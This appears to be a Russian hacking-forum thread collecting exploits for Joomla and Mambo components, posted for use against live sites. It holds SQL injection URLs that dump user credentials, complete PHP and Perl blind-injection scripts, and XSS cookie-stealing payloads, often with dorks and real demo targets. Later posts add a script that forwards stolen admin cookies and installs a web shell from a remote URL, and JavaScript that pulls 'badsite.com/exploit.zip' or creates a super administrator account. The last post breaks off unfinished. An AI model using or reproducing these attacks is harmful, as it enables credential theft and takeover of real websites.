Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

Discussion in 'Веб-уязвимости' started by it's my, 6 Oct 2007.

  1. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Joomla

    Компонент: Fantasytournament (com_fantasytournament)
    Version: 2009.1.5
    Уязвимость: SQL-injection

    Code:
    http://localhost/Path/index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6+from+jos_users--
    Code:
    http://localhost/Path/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--
    Code:
    http://localhost/Path/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--
    Author:"Adrian Gray"​

    Компонент: Camelcitydb2 (com_camelcitydb2)
    Version: 2.2
    Уязвимость: SQL-injection

    Code:
    http://localhost/Path/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11+from+jos_users--&view=detail&Itemid=15
    Author:"Noel Hunter"​
     
    #121 z00MAN, 14 Jan 2009
    Last edited: 14 Jan 2009
    1 person likes this.
  2. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Joomla​

    Компонент: com_Eventing 1.6.x
    Уязвимость: SQL Injection Exploit
    PHP:
    <?php
    ini_set
    ("max_execution_time",0);
    print_r('
    ##############################################################################
    #
    #                Joomla com_Eventing Blind SQL Injection Exploit
    #
    #                             ===  Cyb3R-1st  ===
    #                           cyb3r-1st@hormail.com
    #                      == Writing by Stack - thx m8 - ==
    #
    # usage : php file.php "http://site.me/index.php?option=com_eventing&catid=1"
    #
    ##############################################################################
    '
    );
    if (
    $argc 1) {
    $url $argv[1];
    $r strlen(file_get_contents($url."+and+1=1--"));
    echo 
    "\nExploiting:\n";
    $w strlen(file_get_contents($url."+and+1=0--"));
    $t abs((100-($w/$r*100)));
    echo 
    "Username: ";
    for (
    $i=1$i <= 30$i++) {
    $laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
       if (
    abs((100-($laenge/$r*100))) > $t-1) {
          
    $count $i;
          
    $i 30;
       }
    }
    for (
    $j 1$j $count$j++) {
       for (
    $i 46$i <= 122$i=$i+2) {
          if (
    $i == 60) {
             
    $i 98;
          }
          
    $laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
          if (
    abs((100-($laenge/$r*100))) > $t-1) {
             
    $laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
             if (
    abs((100-($laenge/$r*100))) > $t-1) {
                echo 
    chr($i-1);
             } else {
                echo 
    chr($i);
             }
             
    $i 122;
          }
       }
    }
    echo 
    "\nPassword: ";
    for (
    $j 1$j <= 49$j++) {
       for (
    $i 46$i <= 102$i=$i+2) {
          if (
    $i == 60) {
             
    $i 98;
          }
          
    $laenge strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
          if (
    abs((100-($laenge/$r*100))) > $t-1) {
             
    $laenge strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
             if (
    abs((100-($laenge/$r*100))) > $t-1) {
                echo 
    chr($i-1);
             } else {
                echo 
    chr($i);
             }
             
    $i 102;
          }
       }
    }

    ?>

    # milw0rm.com [2009-01-15]
    Компонент: RD-Autos 1.5.2
    Уязвимость: SQL Injection Vulnerability

    [~] Exploit
    Code:
    /index.php?option=com_rdautos&view=category&id=[SQL]&Itemid=54
    [~] Example
    Code:
    /index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54
     
    #122 z00MAN, 15 Jan 2009
    Last edited: 16 Jan 2009
  3. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Joomla

    Компонент: Gigcal 1.x
    Уязвимость: SQL Injection Vulnerability
    Exploit :
    Code:
    http://localhost/index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
    Компонент: com_pccookbook
    Уязвимость: Blind SQL Injection Exploit

    HTML:
    #!/usr/bin/perl
    use LWP::UserAgent;
    use Getopt::Long;
    
    if(!$ARGV[1])
    {
      print "                                                                        \n";                                                             
      print "  #########################################################################\n";
      print "  #   \n";
      print "  #            Joomla com_pccookbook Blind sql injection exploit \n";
      print "  #   \n";
      print "  #                              Cyb3R-1sT \n";
      print "  #                       cyb3r-1st[at]hotmail.com \n";
      print "  #   \n";
      print "  #                Usage:perl file.pl host path <options> \n";
      print "  #            example: perl file.pl www.host.com /joomla/ -a 7 \n";
      print "  #   \n";
      print "  #                           Options:  -a id \n";
      print "  #   \n";
      print "  #########################################################################\n";
      exit;
    }
    
    my $host    = $ARGV[0];
    my $path    = $ARGV[1];
    my $userid  = 1;
    my $aid     = $ARGV[2];
    
    my %options = ();
    GetOptions(\%options, "u=i", "p=s", "a=i");
    
    print "[~] Exploiting...\n";
    
    if($options{"u"})
    {
      $userid = $options{"u"};
    }
    
    if($options{"a"})
    {
      $aid = $options{"a"};
    }
    
    syswrite(STDOUT, "[~] Password: ", 14);
    
    for(my $i = 1; $i <= 32; $i++)
    {
      my $f = 0;
      my $h = 48;
      while(!$f && $h <= 57)
      {
        if(istrue2($host, $path, $userid, $aid, $i, $h))
        {
          $f = 1;
          syswrite(STDOUT, chr($h), 1);
        }
        $h++;
      }
      if(!$f)
      {
        $h = 97;
        while(!$f && $h <= 122)
        {
          if(istrue2($host, $path, $userid, $aid, $i, $h))
          {
            $f = 1;
            syswrite(STDOUT, chr($h), 1);
          }
          $h++;
        }
      }
    }
    
    print "\n[~] Exploiting done\n";
    
    sub istrue2
    {
      my $host  = shift;
      my $path  = shift;
      my $uid   = shift;
      my $aid   = shift;
      my $i     = shift;
      my $h     = shift;
     
      my $ua = LWP::UserAgent->new;
      my $query = "http://".$host.$path."index.php?option=com_pccookbook&page=viewrecipe&recipe_id=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
     
      if($options{"p"})
      {
        $ua->proxy('http', "http://".$options{"p"});
      }
     
      my $resp = $ua->get($query);
      my $content = $resp->content;
      my $regexp = "Ingredients";
     
      if($content =~ /$regexp/)
      {
        return 1;
      }
      else
      {
        return 0;
      }
    
    }
    Компонент: com_news
    Уязвимость: SQL Injection Vulnerability

    Exploit:
    Code:
    http://localhost/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
    Компонент: com_waticketsystem
    Уязвимость: Blind SQL Injection Exploit
    PHP:
    <?php
    ini_set
    ("max_execution_time",0);
    print_r('
    ##############################################################################
    #
    #                Joomla com_waticketsystem Blind SQL Injection Exploit
    #
    #                             ===  Cyb3R-1st  ===
    #                           cyb3r-1st@hormail.com
    #                            == inject0r5 t3am ==
    #
    #    usegae : php file.php "http://site/index.php?option=com_waticketsystem&act=category&catid=1"
    #
    ##############################################################################
    '
    );
    if (
    $argc 1) {
    $url $argv[1];
    $r strlen(file_get_contents($url."+and+1=1--"));
    echo 
    "\nExploiting:\n";
    $w strlen(file_get_contents($url."+and+1=0--"));
    $t abs((100-($w/$r*100)));
    echo 
    "Username: ";
    for (
    $i=1$i <= 30$i++) {
    $laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
       if (
    abs((100-($laenge/$r*100))) > $t-1) {
          
    $count $i;
          
    $i 30;
       }
    }
    for (
    $j 1$j $count$j++) {
       for (
    $i 46$i <= 122$i=$i+2) {
          if (
    $i == 60) {
             
    $i 98;
          }
          
    $laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
          if (
    abs((100-($laenge/$r*100))) > $t-1) {
             
    $laenge strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
             if (
    abs((100-($laenge/$r*100))) > $t-1) {
                echo 
    chr($i-1);
             } else {
                echo 
    chr($i);
             }
             
    $i 122;
          }
       }
    }
    echo 
    "\nPassword: ";
    for (
    $j 1$j <= 49$j++) {
       for (
    $i 46$i <= 102$i=$i+2) {
          if (
    $i == 60) {
             
    $i 98;
          }
          
    $laenge strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
          if (
    abs((100-($laenge/$r*100))) > $t-1) {
             
    $laenge strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
             if (
    abs((100-($laenge/$r*100))) > $t-1) {
                echo 
    chr($i-1);
             } else {
                echo 
    chr($i);
             }
             
    $i 102;
          }
       }
    }

    ?>
     
  4. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    Joomla Component beamospetition 1.0.12 SQL Injection / XSS
    _______
    http://www.milw0rm.com/exploits/7847
    :::::

    Joomla com_pcchess (game_id) Blind SQL Injection Exploit
    _______
    http://www.milw0rm.com/exploits/7846
    :::::

    Mambo Component SOBI2 RC 2.8.2 (bid) SQL Injection Vulnerability
    _______
    http://www.milw0rm.com/exploits/7841
    :::::

    Joomla Com BazaarBuilder Shopping Cart v.5.0 SQL Injection Exploit
    _______
    http://www.milw0rm.com/exploits/7840
     
  5. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    393
    Likes Received:
    694
    Reputations:
    405
    Уязвимости компонентов Joomla\Mambo

    XSS

    Joomla Component Reservation Manager
    Version: 1.7 (last update on Oct 3, 2008)
    Type: Commercial (99$)
    Vulnerable parametre: year
    Exploit: "><script>alert(document.cookie)</script>
    Dork: "inurl:com_resman"
    Demo: http://resman.webformatique.com/index.php?option=com_resman&task=moreinfo&id=1&year=2010"><script>alert(document.cookie)</script>

    Joomla Component Car Manager
    Version: 2.1 (last update on Jan 6, 2009)
    Type: Commercial (129$)
    Vulnerable parametre: msg
    Exploit: "><script>alert(document.cookie)</script>
    Dork: "inurl:com_carman"
    Demo: http://carman.webformatique.com/index.php?option=com_carman&msg="><script>alert(document.cookie)</script>

    Joomla Component Time Slot Registration
    Version: 1.0.5 (last update on Mar 26, 2008)
    Type: Non-Commercial
    Vulnerable parametre: entity
    Exploit: "><script>alert(document.cookie)</script>
    Dork: "inurl:com_time_slot_registration"
    Demo: http://resadon.fr/index.php?option=com_time_slot_registration&task=viewEventsList&entity="><script>alert(document.cookie)</script>

    Joomla Component Hire Manager
    Version: 1.2 (last update on Oct 3, 2008)
    Type: Commercial (99$)
    Vulnerable parametre: msg
    Exploit: "><script>alert(document.cookie)</script>
    Dork: "inurl:com_hireman"
    Demo: http://hireman.webformatique.com/index.php?option=com_hireman&msg="><script>alert(document.cookie)</script>

    Joomla Component hwdCourses beta
    Version: 1.1.1 (last update on Apr 29, 2008)
    Type: Non-Commercial
    Vulnerable parametre: dif, type
    Exploit: "><script>alert(document.cookie)</script>
    Dork: "inurl:com_hwdcourses"
    Demo: http://www.voc.org/index.php?option=com_hwdcourses&Itemid=114&type=Classic"><script>alert(document.cookie)</script>
     
    1 person likes this.
  6. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    Mambo com_sim v0.8 Blind SQL Injection Exploit
    _______
    http://www.milw0rm.com/exploits/7860
     
  7. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Joomla com_flashmagazinedeluxe (mag_id) SQL Injection Vulnerability
    exploit:
    Code:
    http://localhost/index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=-4+SQL
    Code:
    union+select+1,2,3,unhex(hex(version())),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
    источник:http://milw0rm.com/
    --------------------------------------------------------------
    The End!
     
  8. грамбукса

    грамбукса New Member

    Joined:
    5 Feb 2009
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    может было.. затрете, если да.

    нашел такой сайтец _http://www.joomlascan.com
    - сканировал 1.0.13 с модулем com_datsogallery и нифига не нашло - может кому больше повезет ;)

    еще одна тулза - _http://sourceforge.net/projects/joomscan/
    вроде живой проект.
     
    #128 грамбукса, 24 Feb 2009
    Last edited: 24 Feb 2009
  9. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    Компонент com_xevidmegafx
    Sql-inj
    уязвимость в параметре id:
    19 столбцов
    по идее можно попробывать +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
    но не нашел выводимые поля, поэтому перебирал как Blind SQL
     
    1 person likes this.
  10. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    Code:
    ############################################
    #  Joomla Djice Shoutbox v 1.0 <= Permanent XSS vulnerability  #
    ############################################
     
    - dork: inurl:"index.php?option=com_djiceshoutbox"
     
    The script is affected by Permanent XSS vulnerability, so yuo can put in bad java script code like:
     
    "><script>alert('XaDoS')</script>
     
    or
    
    '">><script>alert('XSS By XaDoS')</script>
     
    the XSS become permanent in every page of site!
    not critical damage but it's not funny..
     
    [+] D3M0:
     
    http://www.djiceatwork.com
     
    contact me at xados @ hotmail . it
    www.securitycode.it
    
    # milw0rm.com [2009-03-10]
     
  11. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    Joomla Component com_bookjoomlas

    Code:
    [+] Bugs
    
    
    - [A] SQL Injection
    
    [-] Security risk: low
    [-] File affected: sub_commententry.php
    
    This bug allows a privileged user to view username
    and password of a registered user. Like all SELECT
    vulnerable queries, this can be manipulate to write
    files on system.
    
    
    *************************************************
    
    [+] Code
    
    
    - [A] SQL Injection
    
    http://www.site.com/path/index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users
    
    
    *************************************************
    
    [+] Fix
    
    No fix.
    
    
    *************************************************
    
    # milw0rm.com [2009-04-06]
     
  12. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    412
    Reputations:
    256
    Code:
    #############################################################################
    #							                    #
    #            Joomla Component MailTo SQL Injection Vulnerability            #
    #							                    #
    #############################################################################
    
    
    ########################################
    
    [~] Vulnerability found by: H!tm@N
    [~] Contact: khghitman[at]gmail[dot]com
    [~] Site: www.khg-crew.ws
    [~] Greetz: boom3rang, KHG, chs, redc00de 
    [~]         -=[Kosova Hackers Group]=--=[KHG-Crew]=-
    
    ########################################
    
    [~] ScriptName:     "Joomla"
    [~] Component:      "MailTo (com_mailto)" 
    [~] Date:           "April 2006"
    
    ########################################
    
    [~] Exploit /index.php?option=com_mailto&tmpl=mailto&article=[SQL]&Itemid=1
    [~] Example /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)KHG+from+jos_users--&Itemid=1
    
    ########################################
    
    [~] LiveDemo: http://www.itp.net/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)KHG+from+jos_users--&Itemid=1
    
    ########################################
    
    [~] Proud 2 be Albanian
    [~] Proud 2 be Muslim
    [~] R.I.P redc00de
    
    ########################################
    ----------------------------------------------------------------+

    Code:
    #############################################################################
    #							                    #
    #           Joomla Component MaianMusic SQL Injection Vulnerability         #
    #							                    #
    #############################################################################
    
    
    ########################################
    
    [~] Vulnerability found by: H!tm@N
    [~] Contact: khghitman[at]gmail[dot]com
    [~] Site: www.khg-crew.ws
    [~] Greetz: boom3rang, KHG, chs, redc00de 
    [~]         -=[Kosova Hackers Group]=--=[KHG-Crew]=-
    
    ########################################
    
    [~] ScriptName:     "Joomla"
    [~] Component:      "MaianMusic (com_maianmusic)"
    [~] Version:        "1.2.1" 
    [~] Date:           "09-26-2008"
    [~] Author:         "Arelowo Alao & David Bennett"
    [~] Author E-mail:  "Alao@aretimes.com"
    [~] Author URL:     "www.aretimes.com"
    
    ########################################
    
    [~] Exploit: /index.php?option=com_maianmusic&section=category&category=[SQL]&Itemid=70
    [~] Example: /index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--&Itemid=70
    
    ########################################
    
    [~] LiveDemo: http://musicsunderground.com/index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--&Itemid=70&lang=en
    
    ########################################
    
    [~] Proud 2 be Albanian
    [~] Proud 2 be Muslim
    [~] R.I.P redc00de
    
    ########################################
    ----------------------------------------------------------------+

    Code:
    #############################################################################
    #							                    #
    #     Joomla Component Cmimarketplace Directory Traversal Vulnerability     #
    #							                    #
    #############################################################################
    
    
    ########################################
    
    [~] Vulnerability found by: H!tm@N
    [~] Contact: khghitman[at]gmail[dot]com
    [~] Site: www.khg-crew.ws
    [~] Greetz: boom3rang, KHG, chs, redc00de 
    [~]         -=[Kosova Hackers Group]=--=[KHG-Crew]=-
    
    ########################################
    
    [~] ScriptName:    "Joomla"
    [~] Component:     "Cmimarketplace (com_cmimarketplace)"  
    [~] Date:          "August 2008"
    [~] Author:        "Magnetic Merchandising Inc."
    [~] E-mail:        "client@ijobid.com"
    [~] Author URL:    "www.ijobid.com"
    
    ########################################
    
    [~] Exploit: /index.php?option=com_cmimarketplace&Itemid=70&viewit=[Directory]&cid=1
    
    [~] Example: /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1
    
    ########################################
    
    [~] Live Demo: http://democmi.ijobid.com/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1
    
    ########################################
    
    [~] Proud 2 be Albanian
    [~] Proud 2 be Muslim
    [~] R.I.P redc00de
    
    ########################################
    © milw0rm.com [2009-04-08]
     
    1 person likes this.
  13. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    Cегодня пришлось дело иметь дело с Джумлой 1.5, начал искать сплоенты, нашел на оффе http://forum.joomla.org/viewtopic.php?f=300&t=371705
    Вот написал небольшой експлоит:
    Code:
    <?php
    // Удаление произвольных изображений в каталоге Joomla
    // by [underwater] 
    $WEB_VULNERABLE = 'http://www.site.com/';
    if(!$archive = obt_archive($WEB_VULNERABLE.'images/')){
     echo '<iframe src="'.$WEB_VULNERABLE.'administrator/index.php?option=com_media&task=file.delete&tmpl=component&folder=&rm[]=index.html" width="1" height="1" frameborder="0"></iframe>'; 
     ob_get_contents();
     sleep(5); 
    }
    if($archive= obt_archive($WEB_VULNERABLE.'images/')){
     foreach($archivos as $valor){
     if(eregi('/', $valor[(count($valor)-1)])){ $tipo = 'folder'; }else{ $tipo = 'file'; }
     echo '<iframe src="'.
     $WEB_VULNERABLE.'administrator/index.php?option=com_media&task='.$tipo
     .'.delete&tmpl=component&folder=&rm[]='.urlencode($valor)
     .'" width="1" height="1" frameborder="0"></iframe>'; 
     }
    }
    function obt_archive($url){
     $buffer = explode(']"> <a href="', file_get_contents($url));
     foreach($buffer as $item=> $valor){
      if($item != '0'){ 
       $temp = explode('"', $valor);
       $retorn[count($retorno)] = $temp[0];
      }
     }
     return $retorn;
    }
    ?>
    Потом нашел ксс
    Code:
    http://127.0.0.1/joomla/index.php?searchword=%253c%2553%2543%2572%2549%2570%2554%2520%2578%253d%2578%253e%2561%256c%2565%2572%2574%2528%2530%2530%2530%2530%2530%2529%253c%252f%2573%2543%2572%2549%2570%2554%253e&ordering=newest&searchphrase=all&option=com_search
    Не знаю была ли найдена ксс до меня или нет, я нигде не встречал, самое вкусное что через нее можно залить шелл, вот сплоит:

    Code:
    <?php
    error_reporting(0);
     
    $EXPL['SITE_VULNERABLE'] = 'http://127.0.0.1/joomla/'; 
    $EXPL['URL_COM_SHELL'] = 'http://127.0.01/shell'; // Путь к шеллу
     
    $EXPL['XSS'] = '<script '.
    'src="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=js" ></script>';
     
    if($_GET['act'] == 'js'){
     die('
     
     var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
     function base64_encode(input){
      var output = "";
      var chr1, chr2, chr3;
      var enc1, enc2, enc3, enc4;
      var i = 0;
      do{
       chr1 = input.charCodeAt(i++);
       chr2 = input.charCodeAt(i++);
       chr3 = input.charCodeAt(i++);
       enc1 = chr1 >> 2;
       enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
       enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
       enc4 = chr3 & 63;
       if(isNaN(chr2)){
        enc3 = enc4 = 64;
       }else if(isNaN(chr3)){
        enc4 = 64;
       }
       output = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) + keyStr.charAt(enc3) + keyStr.charAt(enc4);
      }while(i < input.length);
      return output;
     }
    window.location.href="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=galletas&sabor=" + base64_encode(document.cookie);
    ');
     
    }elseif($_GET['act'] == 'gall'){
     if(!$cookies = base64_decode($_GET['sabor'])) die('<strong>Нет печенья(</strong>');
     $buffer = http_get($EXPL['SITE_VULNERABLE'].'/administrator/index.php?option=com_installer', $cookies);
     $buscar = expl('hidden" name="', $buffer);
     foreach($buscar as $encont){
      $encont = expl('"', $encont);
      $encont = $encont[0];
      if(strlen($encont) == 32){
       $hash = $encont;
       break;
      }
     }
     $buffer = http_post(
      $EXPL['SITE_VULNERABLE'].'/administrator/index.php', $cookies, 
      $hash.'=1&install_url='.urlencode($EXPL['URL_COM_SHELL']).'&installtype=url&task=doInstall&option=com_installer&'
     );
     if(eregi('200 OK', http_get($EXPL['SITIO_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'))){
    / / Операция выполнена успешно! шелл /modules/mod_artimesk/mod_artimesk.php
      header('UnderWhat?!');
      $explot = true;
     }else{
      $explot = false;
     }
     if($archiv_handle = fopen('log_('.date('Y.m.d.H.i.s').')_.txt', 'x')){
      if($explot){
       fwrite($archiv_handle, 'Шелл успешно загружен'. URL: '.$EXPL['SITE_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'."\x0D\x0A");
       header('location: https://forum.antichat.ru');
      }else{
       fwrite($archiv_handle, 
    .$EXPL['SITIO_VULNERABLE'].' Експлоит не может быть использован, так как не совместима версия, или у вас нету админ прав.'."\x0D\x0A");
      }
      fclose($archiv_handle);
     }
     exit($explot);
    }
     
    // Выполнение произвольного кода яваскрипт
    $pedir = $EXPL['SITЕ_VULNERABLE'].'/index.php?searchword='.urlencode(urlencode($EXPL['XSS'])).'&ordering=&searchphrase=all&option=com_search';
    if(http_get($pedir, 'null[]=token')){
     header('location: '.$EXPL['SITIO_VULNERABLE'].'administrator/index.php?option=com_search');
    }else{
     die('hola :-s');
    }
     
    function http_post($url, $cookies, $postdata){
     $timeout = 100;
     $ch = curl_init($url);
     curl_setopt($ch, CURLOPT_POST, true);
     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
     curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout);
     curl_setopt($ch, CURLOPT_HEADER, true);
     curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
     curl_setopt($ch, CURLOPT_COOKIE, $cookies);
     $conten = curl_exec($ch);
     $error = curl_error($ch);
     curl_close($ch);
     if($conten)
      return $conten;
     else
       return $error;
    }
     
    function http_get($url, $cookies){
     $timeout = 100;
     $ch = curl_init($url);
     curl_setopt($ch, CURLOPT_POST, false);
     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
     curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout);
     curl_setopt($ch, CURLOPT_HEADER, true);
     curl_setopt($ch, CURLOPT_COOKIE, $cookies); 
     $conten = curl_exec($ch);
     $error = curl_error($ch);
     curl_close($ch);
     if($conten)
      return $conten;
     else
       return $error;
    }
     
    ?>
     
    #133 [underwater], 16 Apr 2009
    Last edited: 16 Apr 2009
    3 people like this.
  14. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    390
    Likes Received:
    836
    Reputations:
    69
    Joomla Component rsmonials Remote Cross Site Scxripting Exploit

    Code:
    /*
    RSMonials XSS Exploit
    
    http://www.rswebsols.com/downloads/category/14-download-rsmonials-all?download=23%3Adownload-rsmonials-component
    
    Google Dork: allinurl:option=com_rsmonials
    
    Anything entered into the form gets rendered as HTML, so you can add tags
    as long as they don't include quotes (magic quotes eats them, if it's on).
    This component ships with settings that prevent posting by default, but 
    the administrator page for the testimonials renders your script in its entirety.
    
    Proof of Concept 1: Remote file upload
    
    Visit http://target.com/index.php?option=com_rsmonials and post a comment.
    At the end of your glowing comment about how awesome the site is, attach this:
    
    <script src=http://badsite.com/evil.js></script>
    
    Now, when your admin goes to the com_rsmonials "Testimonials" page, your 
    script will execute. In this example, a hidden iframe loads up the install
    page and installs a 'custom' module.
    
    */
    
    var exploited = false;
    var iframe = document.createElement( 'iframe' );
    var reg = new RegExp( 'administrator' );
    if( reg.test( location.href ) )
    {
    	iframe.src = 'index.php?option=com_installer';
    	iframe.setStyle( 'display', 'none' );
    	document.body.appendChild( iframe );
    	iframe.addEvent( 'load', exploit );
    }
    function exploit( e )
    {
    	if( exploited != true )
    	{
    		var doc = e.target.contentDocument; if( !doc ) return;
    		var inp = doc.getElementById( 'install_url' );
    		inp.value = 'http://badsite.com/exploit.zip';
    		var b = inp.parentNode.getElementsByTagName( 'input' )[1];
    		b.onclick();
    		exploited = true;
    	}
    }
    
    /*
    
    Proof of Concept 2: New Super Administrator
    
    Here's a drop-in replacement for the 'exploit' function above:
    
    function exploit( e )
    {
    	if( exploited != true )
    	{
    		var newForm = false;
    		var doc = e.target.contentDocument; if( !doc ) return;
    		var nb = doc.getElementsByTagName( 'a' ); if( !nb ) return;
    		var i = 0;
    		for( ; i<nb.length; i++ )
    		{
    			if( nb[i].parentNode.id == 'toolbar-new' )
    			{
    				nb[i].onclick();
    			}
    			else if( nb[i].parentNode.id == 'toolbar-save' )
    			{
    				doc.getElementById( 'name' ).value = 'hacked';
    				doc.getElementById( 'username' ).value = 'hacked';
    				doc.getElementById( 'email' ).value = 'your@freemail.com';
    				doc.getElementById( 'password' ).value = 'password';
    				doc.getElementById( 'password2' ).value = 'password';
    				var g = doc.getElementById( 'gid' );
    				g.selectedIndex = g.options.length - 1;
    				nb[i].onclick();
    				exploited = true;
    			}
    		}
    	}
    }
    
    If the admin is a Super Admin, then you could be too... just remember to watch
    your freemail account for Joomla's account notification!
    
    */
    /* jdc 2009 */
    
    # milw0rm.com [2009-04-22]
     
  15. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    com_dictionary

    /components/com_dictionary/dictionary.php
    PHP:
    if($wordid)//выбрано слово, надо показать описание
        
    {
            echo 
    "<h3>Описание</h3>";
            
    $database->setQuery("SELECT wordid,word,worddescription FROM #__dictionary where wordid=".$wordid);    
            
    $result $database->query();
            
    $row mysql_fetch_object($result);

    index.php?option=com_dictionary&Itemid=125&wordid=-3+union+select+1,username,password+from+jos_users
     
    1 person likes this.
  16. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    Прочитал в каком-то испанском блоге про следующую уязвимость:

    http://127.0.0.1/joomla/index.php?option=com_user&task=register
    В имени пользователя можно вставить HTML-код, есть небольшой фильтр, который обходится кавычками ;P
    Например, что-то типа:
    Code:
    number" onclick="document.location='http://www.site.com/?cookies.php?cookies='+document.cookie" x="
    
    Дальше дело техники - однопиксельная пикча делает перенаправление на евил скрипт.

    Находится данное чудо тут: /administrator/components/com_users/views/user/tmpl/form.php

    Прикольно то что джумло-кодеры проепали точто также еще 10 файлов)
     
  17. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    Clickheat [fr Joomla]

    Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=1

    Vuln file: install.clickheat.php

    Viln Code:
    Code:
    require_once($GLOBALS['mosConfig_absolute_path']. '/administrator/components/com_clickheat/Recly_Config.php');

    Exploit:

    Code:
